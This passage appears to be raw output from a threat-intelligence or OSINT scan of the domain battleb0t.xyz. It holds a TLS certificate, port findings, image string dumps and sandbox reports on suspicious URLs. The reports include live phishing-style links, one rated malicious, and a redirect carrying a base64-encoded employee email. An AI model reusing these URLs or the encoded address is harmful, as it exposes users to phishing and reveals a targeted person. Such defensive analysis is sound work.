an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:45:54 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:36:85:4f:53:33:b4:86:64:2a:83:12:ed:95:43:fe:1e:22
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 18:58:42 2023 GMT
Not After : Apr 2 18:58:41 2023 GMT
Subject: CN=teamcity.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:a9:1b:77:20:87:f6:da:b4:e6:55:f1:15:61:14:
5d:d5:64:2e:1b:95:d0:fa:42:f5:c5:a3:6e:02:4b:
41:fb:df:35:0c:b5:28:23:7f:95:78:79:7a:ae:1b:
33:21:14:1a:cf:54:dc:ad:7c:ad:0e:d0:0d:13:24:
ac:b2:17:d0:67:2e:56:2e:b6:b0:fc:48:83:bd:01:
86:52:7b:96:4e:60:82:98:48:6b:33:90:dc:af:7a:
0e:ed:26:47:56:e9:2a:9b:55:f7:eb:69:7f:53:8a:
65:d2:d9:9f:8e:b4:d7:c2:d1:e2:bc:27:0e:51:4c:
6a:50:43:bf:f3:eb:93:79:c5:c0:01:20:e4:3f:17:
e9:46:96:6a:c9:c7:d3:3a:19:6a:20:08:fd:61:d6:
98:cf:84:d5:28:4b:ee:2d:d4:11:0b:36:29:51:b8:
23:d5:73:76:da:70:98:bf:4f:33:c0:fe:34:a0:ab:
09:05:a6:dc:26:b2:66:b1:51:b6:f2:4f:d9:92:3a:
c0:21:8b:2a:63:52:83:3f:e9:e2:13:c0:c2:c9:2d:
d5:e5:7e:fd:90:7e:37:42:6b:b9:54:b1:2f:9b:98:
24:d8:0b:1b:69:e7:d3:08:0e:71:57:e8:1a:67:a6:
92:84:48:3f:fc:46:40:41:65:20:38:c9:7e:99:04:
34:72:9a:a0:65:84:01:2f:31:b1:86:06:22:39:91:
0a:ee:bd:30:20:85:c5:8d:5b:4e:77:39:ae:9b:09:
06:f6:07:9d:dd:2d:ba:92:b9:4a:fe:af:b4:b2:6a:
1c:46:10:aa:88:c3:34:ab:7b:51:a7:88:62:ff:6f:
89:37:e0:83:c3:40:7b:7e:a8:e9:d2:e9:e0:68:ff:
51:7e:4a:c3:4d:57:60:55:c2:2c:5e:84:55:31:0d:
f9:06:48:b8:fd:a5:13:e0:6d:e6:16:0e:03:58:98:
01:6a:9c:dd:37:75:36:74:a0:0e:9a:ed:4d:d0:b0:
57:3c:8d:0d:2e:93:98:3c:31:25:01:37:1f:57:7e:
ef:84:b5:c0:04:9b:56:77:f4:78:da:7b:d3:51:11:
80:33:d3:18:83:ee:96:99:02:db:e7:fd:22:71:5a:
7f:e7:e3:95:25:33:c7:56:7f:0d:59:30:dc:3e:03:
7d:f0:6b:ae:f9:f9:7c:ad:ec:ad:62:73:0e:7f:47:
4e:2a:02:fd:df:82:83:00:62:ec:61:18:4d:70:9d:
bd:b9:85:be:c1:ed:b1:f9:61:e0:dc:70:d2:b3:0d:
be:23:ab:b6:3a:43:ae:fe:c3:d3:cf:08:6c:c7:33:
70:eb:d2:70:df:6f:ce:26:37:4c:eb:f9:4f:c2:58:
32:f9:79
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
02:C9:94:28:32:1B:B1:2F:E4:C4:4F:88:0E:4C:57:09:73:5A:37:AF
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:teamcity.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
27:d3:d1:3f:37:d1:a6:d4:dd:5d:21:63:b2:ea:b4:66:27:a6:
fc:15:e2:cd:f0:1a:81:1d:a4:76:d3:26:d6:1f:73:ac:91:e9:
1b:30:5e:03:57:a4:78:5c:1c:9b:32:48:a5:13:6e:fe:4d:2c:
ca:7f:a2:ec:c6:08:67:8d:10:3f:b8:48:53:9b:ab:31:8a:39:
5b:be:de:39:48:27:70:4b:53:85:35:c6:dd:69:ba:94:7b:fe:
33:d6:dc:3e:93:fb:07:c5:1d:2d:db:7b:81:84:0d:f1:31:75:
81:6c:52:e8:a4:f2:94:95:1d:51:50:82:97:37:d5:63:3a:17:
d6:47:90:48:19:2f:01:55:5c:4e:50:b0:6b:36:d6:b3:1f:43:
62:1c:b5:b3:7c:5c:47:78:0f:ba:ae:0b:44:f3:88:f9:26:67:
58:1c:81:8c:05:40:88:56:f9:30:44:64:32:06:0f:52:c3:de:
74:23:e1:51:9e:b3:c2:ea:ae:7b:71:42:02:db:c3:89:ea:af:
b4:cd:24:fe:07:e3:e4:d4:76:9d:9d:ea:3f:83:76:ca:50:69:
73:c4:c1:63:b7:2e:f4:26:47:bc:f1:48:fa:81:d9:4e:df:bc:
18:e1:6a:4b:93:17:ed:e0:1a:a0:b0:88:53:7e:d3:8b:c4:7a:
7e:4b:d4:44
| battleb0t.xyz |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:8443 | 188.114.96.0/24 |
| 2023-05-12 02:49:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeibeav&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:6664:120:WilError_01"\n "Local\\SM0:7604:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:7604:120:WilError_01"\n "Local\\SM0:7604:120:WilError_01"\n "Local\\SM0:6664:304:WilStaging_02"\n "SM0:6664:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:6664:304:WilStaging_02"\n "Local\\SM0:6664:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6664:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.217.12.97:443"\n "185.199.110.153:443"\n "69.16.175.10:443"\n "172.217.164.99:443"\n "142.250.191.78:443"\n "142.251.46.170:443"\n "172.217.12.99:443"\n "209.94.90.1:443"\n "142.251.214.142:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bafybeibeavvyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi.ipfs.dweb.link"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00006664]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\edge_driver.js]- [targetUID: 00000000-00006664]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006664]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 97180"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "GIF image data version 89a 64 x 64"- [targetUID: N/A]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.8\\edge_autofill_field_data.json]- [targetUID: 00000000-00006664]\n "7a1fdcd3-4d20-482f-8d7a-33c2f9952216.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\7a1fdcd3-4d20-482f-8d7a-33c2f9952216.tmp]- [targetUID: 00000000-00006664]\n "f_00023d" has type "Web Open Font Format (Version 2) TrueType length 71896 version 4.393"- [targetUID: N/A]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6664_267374355\\product_page.js]- [targetUID: 00000000-00006664]\n "edge_autofill_global_block_list.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.8\\edge_autofill_global_block_list.json]- [targetUID: 00000000-00006664]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.6\\deny_domains.list]- [targetUID: 00000000-00006664]\n "9a3a6287a4dba55d_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\9a3a6287a4dba55d_0]- [targetUID: 00000000-00006664]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\manifest.json]- [targetUID: 00000000-00006664]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00001600]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2023.3.1\\crl-set]- [targetUID: 00000000-00006664]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00006664]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%TEMP%\\6664_267374355\\manifest.fingerprint]- [targetUID: 00000000-00006664]\n "873647c0-9469-42e0-97e2-a93757408a94.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\873647c0-9469-42e0-97e2-a93757408a94.tmp]- [targetUID: 00000000-00006664]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00006664]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeibeav&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "Math.PI/180"\n Pattern match: "https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"\n Pattern match: "vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeibeav&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp"\n Pattern match: "https://vyugk3hebrigyeklqkqr6kflvuyt3lszjryyapbatlpelvwi-ipfs-dweb-lin"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.191.78"\n "UDP connection to 172.217.164.99"\n "UDP connection to 142.251.46.170"\n "UDP connection to 142.251.214.142"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\edge_driver.js]- [targetUID: 00000000-00006664]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6664_267374355\\product_page.js]- [targetUID: 00000000-00006664]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\6664_1337468108\\adblock_snippet.js]- [targetUID: 00000000-00006664]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4516.0\\shopping.js]- [targetUID: 00000000-00006664]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6664_267374355\\shoppingfre.js]- [targetUID: 00000000-00006664]\n "edge_checkout_page_validator.js" has type "Unknown"- Location: [%TEMP%\\6664_267374355\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006664]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\6664_267374355\\edge_tracking_page_validator.js]- [targetUID: 00000000-00006664]\n "auto_ | 185.199.110.153 |
| 2023-05-12 02:54:20 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8200::c8:80 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:33:48 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif
8Photoshop 3.0
mntrRGB XYZ
acspAPPL
-appl
0cprt
Pwtpt
chad
gTRC
mluc
3mluc
2XYZ
5CrOZpRG?
rE8d0'8
hl1b1
GJ2W<
zkHdm
J\pwt
P49$v
O.D.>
Kn8lR
2N001
OpXSw
1r0zb
H@?6>
Oe!Cg'
H8?J '
>\aO4
z98brzQ
AP0Gzz
?n@Rq
"d!8?
ixnGn8
lSr:w
nAcJ3
GoZg
E<nNq
sGpXt
NGjTD
7OOZR
!$pGZs
R>oJ
3pzTy
Jv 8<c
60??JX
<t5 <
zzSYA`G
NE\m
PCu5.A
'4aKp
Z@Nzd
?JL.>f
Fp9?Zv
W!NiH
.Fpy
wjaq9
Tl em
SHp8n
J@7.I9
Ip2zs
zx?6
RJ7'9
rO85/
7OOSM
JFI$n
<coz\
E<d1`8
?7_J:
zdsFGZ
M8p9<
OcHWw
!FOZj
iUW$w
JOBFir1
@8cns
pVV!O
f?7nq@
h- R6q
Uo1pFq
!8<.GJ
:Tch t
zR>aQ rA
\`rO?
d7JBX/
J:mpI
q@99'
R0E7p$
8cRm`
cm?n@
`YppqG
946p:`
O!@ r
r?1@1
O8nFzw
iBG_Zj
ORE' m
vFGqM
SBnn1
NGoaN
pNO4 | https://pics.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 02:58:47 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DbXlldW5nQHRlc2xhLmNvbQ%3D%3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3fc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_3fc_IESQMMUTEX_0_519"\n "IsoScope_3fc_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_3fc_IE_EarlyTabStart_0xc84_Mutex"\n "IsoScope_3fc_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_3fc_ConnHashTable<1020>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1020"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.214.28.209:443"\n "65.8.165.51:80"\n "65.8.165.104:80"\n "65.8.165.23:80"\n "65.8.165.88:80"\n "34.74.170.74:443"\n "65.8.158.81:443"\n "142.251.211.227:443"\n "142.250.217.106:443"\n "142.251.211.227:80"\n "142.251.215.227:443"\n "52.95.155.94:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"jsv3.recruitics.com"\n "o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "ocsp.pki.goog"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "H97NHH5Q.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H97NHH5Q.txt]- [targetUID: 00000000-00001020]\n Dropped file: "LQDJU2M7.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LQDJU2M7.txt]- [targetUID: 00000000-00001020]\n Dropped file: "DYMZMYB9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DYMZMYB9.txt]- [targetUID: 00000000-00003024]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_DF18B54C-3E77-11ED-BA58-0800272A2F3E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "www.recaptcha_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D6243C18F0F8F9AEC6638DD210F1984_C4E912EA1CF7478AEFF10983696CE52E]- [targetUID: 00000000-00003024]\n "KFOlCnqEu92Fr1MmEU9fBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001020]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003024]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003024]\n "H97NHH5Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H97NHH5Q.txt]- [targetUID: 00000000-00001020]\n "~DF1E50A457EB0DA7FD.TMP" has type "data"- Location: [%TEMP%\\~DF1E50A457EB0DA7FD.TMP]- [targetUID: 00000000-00001020]\n "E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E87CE99F124623F95572A696C80EFCAF_48A0517CBEDC34E374472FB21AABC8A8]- [targetUID: 00000000-00003024]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001020]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003024]\n "styles__ltr_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00003024]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001020]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://jsv3.recruitics.com/redirect?rx_cid=3394&rx_jobId=22014906&rx_url=https%3A%2F%2Fkeen-queijadas-051918.netlify.app%2F%3Fdir%3DbXlldW5nQHRlc2xhLmNvbQ%3D%3D"\n Pattern match: "https://jsv3.recruitics.com"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic match: "ocsp.sca1b.amazontrust.com"\n Heuristic match: "GET 